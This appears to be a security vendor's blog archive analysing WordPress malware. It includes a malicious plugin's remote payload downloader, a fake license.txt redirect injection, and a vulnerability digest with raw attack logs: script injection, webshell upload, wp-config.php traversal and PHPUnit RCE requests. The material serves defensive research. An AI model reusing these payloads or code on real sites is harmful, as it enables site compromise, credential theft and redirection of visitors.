          $f=ABSPATH.$f;
            if(!file_exists($f)||filesize($f)<1000) {
                if(!$wsd) 
                $wsd = file_get_contents('hxxp://www[.]24hod[.]sk/colours/layout/wsos.txt');
              if($wsd)
                file_put_contents($f,$wsd);
          }
    }
}

Once the malicious payload has been delivered, the plugin uses two different methods to execute the malware.

First, the malware leverages a WordPress function called add_action() that attempts to run shield_01() when the init hook is executed. If the function add_action() doesn’t exist, the malicious code calls shield_01() directly.

if(function_exists('add_action')){
    add_action( 'init', 'shield_01');
}else{
    shield_01();
}

It’s important to note that attackers can leverage plugin vulnerabilities and other malicious code even if a plugin is deactivated in your WordPress environment.

We highly recommend regularly auditing your plugins and themes and removing any unknown or unused components from your website. Our free guides offer more WordPress security hardening tips to help you secure your environment.

Apr 21, 2020 by Krasimir Konov

Fake License.txt File Loaded Through PHP Include

Our team recently found a malicious injection located within a PHP include. The redirect occurs via the include function, which includes a file inconspicuously named license.txt.

During our investigation, we located the license.txt injected within header.php of the WordPress theme file. 

include('license.txt'); ?>
        </header> <!-- #main-header -->
    <?php
        $main_header = ob_get_clean();

        /**
         * Filters the HTML output for the main header.
         *
         * @since ??
         *
         * @param string $main_header
         */
        echo apply_filters( 'et_html_main_header', $main_header );
    ?>
        <div id="et-main-area">
    <?php
        /**
         * Fires after the header, before the main content is output.
         *
         * @since ??
         */
        do_action( 'et_before_main_content' );

The license.txt file is essentially a redirect to send site visitors to a malicious domain, which uses HTML to generate a redirect to the malicious website https://times2day[.]com, and was registered on February 6th, 2020. 

<?php
<html>
<meta http-equiv="X-UA-Compatible"
content="IE-Edge">
   <meta name="viewport" content="width=device-width,
initial scale=1">
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
   <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.min.css'>
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
   </script>
   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js">
    </script>
   <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
</head>
<body>
<script>
swal({
    title: 'Oh, you must be visiting us!!!! ',
    text: 'Getting access..... ',
    icon: 'success',
    timer: 2000,
    buttons: false,
})
.then(() => {
    window.location.href = "https://times2day.com/";
})
</script>
</body>
</html>

?>

To detect these types of malicious injections, site owners can scan websites for known malware, blacklisting status, website errors, out-of-date software, and malicious code.

Apr 3, 2020 by Luke Leal

Vulnerabilities Digest: March 2020

Fixed Plugins and Vulnerabilities

Plugin Vulnerability Patched Version Installs
Cookiebot Reflected Cross-Site Scripting 3.6.1 40000
Data Tables Generator By Supsystic Authenticated Stored XSS 1.9.92 30000
WPvivid Backup Database Leak 0.9.36 40000
Advanced Ads Reflected XSS 1.17.4 100000
Category Page Icons Arbitrary File Upload/Deletion 0.9.1 Closed
Cookiebot Reflected Cross-Site Scripting 3.6.1 40000
Custom Post Type UI CSRF to Stored XSS 1.7.4 800000
Fruitful Authenticated Stored XSS 3.8.2 9000
responsive-add-ons Unprotected AJAX Endpoints 2.2.6 40000
Import Export WordPress Users Authenticated Arbitrary User Creation 1.3.9 30000
LearnPress Privilege Escalation 3.2.6.7 70000
Multiple Plugins Unauthenticated RCE via PHPUnit all -
Multiple WebToffee Plugins CSRF 1.3.3 2000
Popup Builder Multiple Issues 3.64.1 100000
Viral Optins Arbitrary File Upload all closed
WordPress File Upload Directory Traversal to RCE 4.13.0 20000
WPML Cross Site Request Forgery to RCE 4.3.7 30000

 

Highlights for March 2020

Cross site scripting and Cross Site Request Forgery vulnerabilities were most prevalent this month. Attackers took advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.

Ongoing Campaign Targets Plugin Vulnerabilities

An ongoing malicious campaign that we’ve been actively tracking since early 2019 continues targeting new plugin vulnerabilities to inject malicious domains.

Malicious domain injected during this month: clon[.]collectfasttracks[.]com

Social Metrics Tracker

185.50.197.12 - --3e87eee3d[...]script type=text/javascript src='https://clon.collectfasttracks.com/hos?&v5'></script>\x0D\x0A--3e87eee3d99c55ee9a39a59184ff3f05905a195557207837f3015d906347--\x0D\x0A [15/Mar/2020:19:55:14 +0000] "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1§ion=gapi HTTP/1.1"

Simple Fields

185.50.197.12 - --3e87eee3d[...]script type=text/javascript src='https://clon.collectfasttracks.com/hos?&v5'></script>\x0D\x0A--3e87eee3d99c55ee9a39a59184ff3f05905a195557207837f3015d906347--\x0D\x0A [15/Mar/2020:19:55:14 +0000] "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1§ion=gapi HTTP/1.1"

Pricing Table by Supsystic

 185.212.128.162 - - [18/Mar/2020] "GET /wp-admin/admin-ajax.php?action=getJSONExportTable&tables[]=8&reqType=ajax&mod=tables&pl=pts HTTP/1.1"

Brizy – Page Builder

207.180.198.200 - - [12/Mar/2020] "GET /wp-content/plugins/brizy/admin/site-settings.php HTTP/1.1"

WP Security Audit Log

207.180.198.200 - - [12/Mar/2020] "GET /wp-content/plugins/brizy/admin/site-settings.php HTTP/1.1"

WordPress WP User Frontend

185.219.168.18 - - [17/Mar/2020] "GET /wp-admin/admin-ajax.php?action=wpuf_file_upload HTTP/1.1"

Adblock Blocker

185.219.168.18 - --0747fb1e8d3cfc0d658e7a77f51c7758\x0D\x0AContent-Disposition: form-data; name=\x22popimg\x22; filename=\x22settings_auto.php\x22\x0D\x0A\x0D\x0A[...] echo \x22not exits\x22;\x0D\x0Aecho \x22done .\x5Cn \x22 ;\x0D\x0A\x0D\x0A@unlink(__FILE__);\x0D\x0A?>\x0D\x0A\x0D\x0A--0747fb1e8d3cfc0d658e7a77f51c7758--\x0D\x0A [17/Mar/2020:13:25:45 +0000] "POST /wp-admin/admin-ajax.php?action=getcountryuser&cs=2 HTTP/1.1"

Multiple Plugins - Access to Sensitive Files

113.162.159.230 -- GET -- /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23

Multiple Plugins Affected by an Old Vulnerability in PHPUnit

As seen in January attackers are continuing to leverage an RCE in PHPUnit along with several plugin vulnerabilities found in the past month.

Unpatched versions of PHPUnit prior to 4.8.28 and 5.6.3 allow remote attackers to execute arbitrary PHP code via HTTP POST data.

Jekyll-exporter

118.27.25.88 - <?php  echo 'RCE_VULN|'; echo php_uname();?> [13/Mar/2020] "POST //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"

Wp-heyloyalty

118.27.5.203 - <?php  echo 'RCE_VULN|'; echo php_uname();?> [12/Mar/2020] "POST //wp-content/plugins/wp-heyloyalty/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"
[...]

Detected IPs

163.44.149.193
118.27.5.203
118.27.25.88
185.219.168.18
77.71.115.52
182.161.69.114
5.101.0.209
190.117.233.1

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

Mar 27, 2020 by John Castro